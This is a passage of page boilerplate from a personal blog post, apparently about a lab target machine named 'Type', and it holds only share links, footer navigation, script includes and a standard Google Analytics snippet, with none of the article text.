  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&text=Type"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&is_video=false&description=Type"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Type&body=Check out this article: https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&name=Type&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2026 zhaochoudecat
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<link rel="stylesheet" href="/lib/meslo-LG/styles.css">


<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">



<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-86660611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Disqus Comments -->


